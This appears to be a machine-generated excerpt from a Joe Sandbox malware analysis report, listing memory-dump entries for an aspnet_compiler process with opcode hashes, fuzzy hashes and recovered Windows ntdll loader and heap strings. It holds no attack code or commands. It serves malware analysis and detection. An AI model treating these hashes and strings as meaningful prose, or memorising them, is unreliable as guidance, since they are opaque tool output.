                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                    • API String ID: 0-3178619729
                                                    • Opcode ID: 3d2a202ba40022fe0c05d0aed0f09d32a13bc0af26e8c131e3d98b2e91e431a7
                                                    • Instruction ID: 7c53453c9c74e201c919571df1e8f1d36bf9d3b6f2db3fc296596584de188815
                                                    • Opcode Fuzzy Hash: 3d2a202ba40022fe0c05d0aed0f09d32a13bc0af26e8c131e3d98b2e91e431a7
                                                    • Instruction Fuzzy Hash: 0513BF71A00259CFDF69CF68C4A07ADBBF1BF49304F1481AAD999AB381D734A845DF90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-3570731704
                                                    • Opcode ID: 2235d1b5ac9e1affa32b5b8e92f8365a6c84b0eec6138b80d4eaa4c426678d44
                                                    • Instruction ID: 32632fc6a580eeac5d51aec1677335eb3501bbc51630a687a4996b99de8549a9
                                                    • Opcode Fuzzy Hash: 2235d1b5ac9e1affa32b5b8e92f8365a6c84b0eec6138b80d4eaa4c426678d44
                                                    • Instruction Fuzzy Hash: D7926975A0122ACFEF65CB19CC54BA9B7F1BF45324F0581EAD989AB281D7309E80CF51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    • API String ID: 0-379654539
                                                    • Opcode ID: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
                                                    • Instruction ID: 9c4ba23efa58783345d96fea5747c7d8285d7fd0b62eb01fe1b139ab15d6f5c0
                                                    • Opcode Fuzzy Hash: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
                                                    • Instruction Fuzzy Hash: 90C18B7460C386CFDB11EF59C044B6AB7E4BF88704F04496AF9D58BA51E738CA49CB62
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 010B8421
                                                    • LdrpInitializeProcess, xrefs: 010B8422
                                                    • @, xrefs: 010B8591
                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010B855E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1918872054
                                                    • Opcode ID: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                                    • Instruction ID: 0e1f4432399fd8543f0e8134e25d0c5234c34b6bae10d295d7fa74ed5bc16e5a
                                                    • Opcode Fuzzy Hash: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                                    • Instruction Fuzzy Hash: 04918871508345AFD761EB25CC81FAFBAECBB88744F40492EFAC496161E734D9448B62
                                                    Strings
                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 010E106B
                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 010E1028
                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 010E0FE5
                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010E10AE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                    • API String ID: 0-1468400865
                                                    • Opcode ID: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                                    • Instruction ID: c379ca71bd00ea4648c99ff449b635a176e1b912d1bc208ae837d59533b6eb90
                                                    • Opcode Fuzzy Hash: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                                    • Instruction Fuzzy Hash: 5971BFB19083059FCB61EF14C885B9B7FE8AF54764F400469F9C88B286D775D588CBE2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                    • API String ID: 0-336120773
                                                    • Opcode ID: 57db7dd82ca5599060c045b2fd6696a6ff4ab567e0af01a21fa3910263f55738
                                                    • Instruction ID: 5e5cf29aac124d3d72c76ea1cb2ebb25814b5d5c5e9495ac097f234ea121dd6a
                                                    • Opcode Fuzzy Hash: 57db7dd82ca5599060c045b2fd6696a6ff4ab567e0af01a21fa3910263f55738
                                                    • Instruction Fuzzy Hash: 83314471210200FFD718DB98CC85FABBBE8EF45664F250059F895CB294EB31AC40CBA9
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 010EA9A2
                                                    • apphelp.dll, xrefs: 010A2462
                                                    • LdrpDynamicShimModule, xrefs: 010EA998
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010EA992
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-176724104
                                                    • Opcode ID: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                                    • Instruction ID: 5d5e77afc3d5dcc0cd6da5f23007c19374eb795a701f4ee1f1ccfc45b20f4c7f
                                                    • Opcode Fuzzy Hash: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                                    • Instruction Fuzzy Hash: EB312A75B10301EFDB399F9AD845AAEB7F5FB88714F160069E9A1AB345C7705881CB80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                    • API String ID: 0-1391187441
                                                    • Opcode ID: 7802a2c84e84d583802649aacf3d5b7c0f171fc65162e3836ba45273a809e11d
                                                    • Instruction ID: d2242475b62ca09c9964263feac657a3a672b83eebc3fa04dd1d0f424e15db9b
                                                    • Opcode Fuzzy Hash: 7802a2c84e84d583802649aacf3d5b7c0f171fc65162e3836ba45273a809e11d
                                                    • Instruction Fuzzy Hash: 8A31A332A00205EFCB41DB59CC84FEEBBF8EF46A74F154059F994AB291DB70E940CA65
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $ $0
                                                    • API String ID: 0-3352262554
                                                    • Opcode ID: 7f40a3e03da7968c10feacbb4c7cd0e0892c7b75e330613d30d13ddcf9ca4c77
                                                    • Instruction ID: c965e1e06cf277ea251d9793a622d8ed58e38b9d868f6a239ae494e88a0d334e
                                                    • Opcode Fuzzy Hash: 7f40a3e03da7968c10feacbb4c7cd0e0892c7b75e330613d30d13ddcf9ca4c77
                                                    • Instruction Fuzzy Hash: 593225B16083998FE728CF68C484B9BBBE4BF88318F04492DF59987350D775E958CB52
                                                    Strings
                                                    • HEAP[%wZ]: , xrefs: 01081712
                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01081728
                                                    • HEAP: , xrefs: 01081596
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                    • API String ID: 0-3178619729
                                                    • Opcode ID: e454d1c153a1b8a8a379696f4add6bd1d9f5912895ce26c951284d4e95b87974
                                                    • Instruction ID: ece3be167a32f3667d95c6df073a8d0c90a33b787c4ffebaee8881a3ecb0972a
                                                    • Opcode Fuzzy Hash: e454d1c153a1b8a8a379696f4add6bd1d9f5912895ce26c951284d4e95b87974
                                                    • Instruction Fuzzy Hash: F6E1DE30A086469FDB29DF6CC451ABABBF1BF48304F18849DE9D6CB246D734E942CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    • API String ID: 0-2779062949
                                                    • Opcode ID: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                                    • Instruction ID: 6a833ef558fd94124f904367213ef3d920eceafcb7bf87f6e61da8895abe3392
                                                    • Opcode Fuzzy Hash: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                                    • Instruction Fuzzy Hash: A4A179719012299BEB319F68CD88BEEB7B8FF44710F0041EAE949A7250DB359E85CF54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                    • API String ID: 0-373624363
                                                    • Opcode ID: 1042f4b5b5d35d2b50fd88ce30d15378cc20571a1dc323f436ac3b4de8cdce79
                                                    • Instruction ID: c65d27b46449a6f857005d2d9d3ea9eb7c0b8aec21ae123828c03a77fa3d66bb
                                                    • Opcode Fuzzy Hash: 1042f4b5b5d35d2b50fd88ce30d15378cc20571a1dc323f436ac3b4de8cdce79
                                                    • Instruction Fuzzy Hash: 4491BD71A0821ACFEB21DF59C554BAEBBF0FF05318F144195E9D1AB290D7789A81CBA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %$&$@
                                                    • API String ID: 0-1537733988
                                                    • Opcode ID: 7fdd23d21dcebd485759c80cf6bde0bbf108921fed5a28fd504420637c39cd46
                                                    • Instruction ID: f83b8dc6721c93335128fa5b006b0f8a16ed2583fa21757ac499a23a2f88b3c0
                                                    • Opcode Fuzzy Hash: 7fdd23d21dcebd485759c80cf6bde0bbf108921fed5a28fd504420637c39cd46
                                                    • Instruction Fuzzy Hash: D371BEB09093069FD714DF28C9C0AAFBBE5BF8461CF108A5DE6EA47691C730D905CB92
                                                    Strings
                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 010EA589
                                                    • LdrpCompleteMapModule, xrefs: 010EA590
                                                    • minkernel\ntdll\ldrmap.c, xrefs: 010EA59A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                    • API String ID: 0-1676968949
                                                    • Opcode ID: f093432e1a3c7f287195a6d8d60e136083c553af396d4cbd9179f5db31886aec
                                                    • Instruction ID: fe731de47371b9d7d506102539b78d18d5084820449ef52cd90ff98768eb1d5d
                                                    • Opcode Fuzzy Hash: f093432e1a3c7f287195a6d8d60e136083c553af396d4cbd9179f5db31886aec
                                                    • Instruction Fuzzy Hash: 16510331700741DFEB22DEADC948B6A7BE9BB08764F5801A4EAD1DB6D2C774E840CB40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                    • API String ID: 0-1151232445
                                                    • Opcode ID: 389f4f7627e580be72ef362297046400271019c2410b89470dca0e5486c7bfa5
                                                    • Instruction ID: cca89b507ed3f641119b84df4c10198a19cb78083a8affd75e9627b70dfa9cf8
                                                    • Opcode Fuzzy Hash: 389f4f7627e580be72ef362297046400271019c2410b89470dca0e5486c7bfa5
                                                    • Instruction Fuzzy Hash: 4C4109B0B00380CFEF79CAADC4887B97BE19F05384F1884E9D5C68B69AD678D885C755
                                                    Strings
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0113C1C5
                                                    • @, xrefs: 0113C1F1
                                                    • PreferredUILanguages, xrefs: 0113C212
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    • Opcode ID: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
                                                    • Instruction ID: 7ed3cff642500e619548674884fa71a64e6513ad317ceadd8e0c3c71d58677c0
                                                    • Opcode Fuzzy Hash: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
                                                    • Instruction Fuzzy Hash: CE416372E00219EBDF15DBD8C851FEEBBB9AB94700F14406BEA49F7244D7749A448B90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    • Opcode ID: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
                                                    • Instruction ID: 2311db793bfb4142fe3cb5bb7f6940a0ad1542722bcd070725b8b640904ac47a
                                                    • Opcode Fuzzy Hash: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
                                                    • Instruction Fuzzy Hash: 9D4126319002588BEB29DBE8D850BEDFBB4FF55B40F240469D941EFB85D7349941CB51
                                                    Strings
                                                    • SXS: %s() passed the empty activation context data, xrefs: 010F29FE
                                                    • Actx , xrefs: 010B33AC
                                                    • RtlCreateActivationContext, xrefs: 010F29F9
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                    • API String ID: 0-859632880
                                                    • Opcode ID: c500aec88a13d910490fd123c2407b0fa1605aef0580041c59348d4fcd41373b
                                                    • Instruction ID: 5dce3b71c68514201bae275c19c87ee4619e94dc6219c67f2e5659d609157448
                                                    • Opcode Fuzzy Hash: c500aec88a13d910490fd123c2407b0fa1605aef0580041c59348d4fcd41373b
                                                    • Instruction Fuzzy Hash: 7D312432600306DFEB26DE58C8C1BDB7BA4FB44710F2544A9EE449F281DB74E845CB90
                                                    Strings
                                                    • GlobalFlag, xrefs: 0110B68F
                                                    • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0110B632
                                                    • @, xrefs: 0110B670
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                    • API String ID: 0-4192008846
                                                    • Opcode ID: a6c3802dbc48c10204ffc82b03a80c8795a42d05e5556d6be16d1ac2a2f8ef03
                                                    • Instruction ID: b0c9b1649c08a679497566c9cfdaea57878b91034f45155959a9d6d841848ece
                                                    • Opcode Fuzzy Hash: a6c3802dbc48c10204ffc82b03a80c8795a42d05e5556d6be16d1ac2a2f8ef03
                                                    • Instruction Fuzzy Hash: 10314DB5E0020AAFDB15EFA5CC80AEFBB7CEF44744F140469E605A7190D7749E40CBA8
                                                    Strings
                                                    • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 010C127B
                                                    • @, xrefs: 010C12A5
                                                    • BuildLabEx, xrefs: 010C130F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                    • API String ID: 0-3051831665
                                                    • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                    • Instruction ID: 6100a7f401405c84a1a960f4b495f4daf7f9172c1c0e9d058ec8d4ee37f9b37f
                                                    • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                    • Instruction Fuzzy Hash: AC31A17290061DEFDB12AF95CC44EDEBFBDEB94B14F004029FA54A7660D7319A059F90
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01102104
                                                    • Process initialization failed with status 0x%08lx, xrefs: 011020F3
                                                    • LdrpInitializationFailure, xrefs: 011020FA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2986994758
                                                    • Opcode ID: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
                                                    • Instruction ID: 08756b3918a5597afdabc437cc503ef25d3d892972a185f0d81ff81a5bf24c9c
                                                    • Opcode Fuzzy Hash: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
                                                    • Instruction Fuzzy Hash: A8F0C235A40308AFE729E64CCC46F9A777DFB80B54F54006DFA90BB6C5D2F0A940CA91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    • Opcode ID: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
                                                    • Instruction ID: 9afe3e0313d30227efcf1a6d89d14c72217b6644e03342c6ed4cb346093a38a0
                                                    • Opcode Fuzzy Hash: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
                                                    • Instruction Fuzzy Hash: E57159B1A0014A9FDF05DFA9C994BAEB7F8BF08744F144069E945EB251EB34ED41CBA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@
                                                    • API String ID: 0-149943524
                                                    • Opcode ID: f50c0fcdce8ce503238fd0f8c0aa6c41e58b6740d8c0d21b34630b492c71837a
                                                    • Instruction ID: 29c96a46f065a1e8a536f8acc242a30f1cb6a74f3545820fbd5d23e44a1f88c4
                                                    • Opcode Fuzzy Hash: f50c0fcdce8ce503238fd0f8c0aa6c41e58b6740d8c0d21b34630b492c71837a
                                                    • Instruction Fuzzy Hash: 6032CE705083118FDB658F1AD8A477EBBE1EF88704F14895EFAC59B290E735D840EB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction ID: bc5b0cb449afaf569bdd199b49ecc3c1cbf71806bf0d39f183e9430fafe03e4d
                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction Fuzzy Hash: 91C1E4312443429BEB29CF28D841B6BBBE5BFC4B18F094A2DF696CB290D775D505CB81
                                                    Strings
                                                    • kLsE, xrefs: 01080540
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0108063D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 0-2547482624
                                                    • Opcode ID: f1b59cc8a7f2d8239be7e3831e4e373ad45e6854c6e63175cb5a6d869b84a1ce
                                                    • Instruction ID: 6de1f93578c88da1cdb3a5d2323a350c1dafc5974bd77f648e5d2c699d4b2c87
                                                    • Opcode Fuzzy Hash: f1b59cc8a7f2d8239be7e3831e4e373ad45e6854c6e63175cb5a6d869b84a1ce
                                                    • Instruction Fuzzy Hash: E551AF716087468FD724EF68C4406A7BBE4AF88304F14883EFAE987245E7709549CBA1
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0108A2FB
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0108A309
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    • Opcode ID: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
                                                    • Instruction ID: 5c60fda5514f1f03659857959585de44759f838d0f1d09ede119d43bf19e4609
                                                    • Opcode Fuzzy Hash: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
                                                    • Instruction Fuzzy Hash: 0341AC31B08659DFDB21AF69C844BAE7BF4BF84300F1480AAE9C0DB691E2B5D940CB40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                    • API String ID: 0-118005554
                                                    • Opcode ID: 2950eedc4b8ca41ca524ca083f04dd6fe2162ef652880b7539430cc6e6aa901e
                                                    • Instruction ID: 12904ec63f2a4767058d698c9d61d0b3bc6cfe2dce95f6793618de49e70e3657
                                                    • Opcode Fuzzy Hash: 2950eedc4b8ca41ca524ca083f04dd6fe2162ef652880b7539430cc6e6aa901e
                                                    • Instruction Fuzzy Hash: FA31C3312197429FE319DF28D854B5AB7E4FF84724F050869F9A4CB398EB30DA05CB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local\$@
                                                    • API String ID: 0-380025441
                                                    • Opcode ID: 44a6ee1503ad7f64968c6fb3c7fc8bd72a1cff464b1e7a6fe056ec669421c326
                                                    • Instruction ID: ecba78d0fe8e29cafcbca9cbf828a576344b7e63f6373884314c9c0cdc43ecfc
                                                    • Opcode Fuzzy Hash: 44a6ee1503ad7f64968c6fb3c7fc8bd72a1cff464b1e7a6fe056ec669421c326
                                                    • Instruction Fuzzy Hash: 3E31AFB2109705AFC311DF28C8C0A9FBBE8FB94A54F54492EF9D58B310DA30DD048B92
                                                    Strings
                                                    • RtlpInitializeAssemblyStorageMap, xrefs: 010F2A90
                                                    • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 010F2A95
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                    • API String ID: 0-2653619699
                                                    • Opcode ID: c0a7e668bdce2a6de18197e0e606c66d4fcf4b1830559f5d4ceb8bad53767182
                                                    • Instruction ID: a3944e5f11d36737306c8f41f7a77054b603129f007a1516dff7344c75ec4ed1
                                                    • Opcode Fuzzy Hash: c0a7e668bdce2a6de18197e0e606c66d4fcf4b1830559f5d4ceb8bad53767182
                                                    • Instruction Fuzzy Hash: F8112C75B00205FBF7268A4D8D82FEB76E9AB94B54F24806D7B44DF240D775DD008290
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
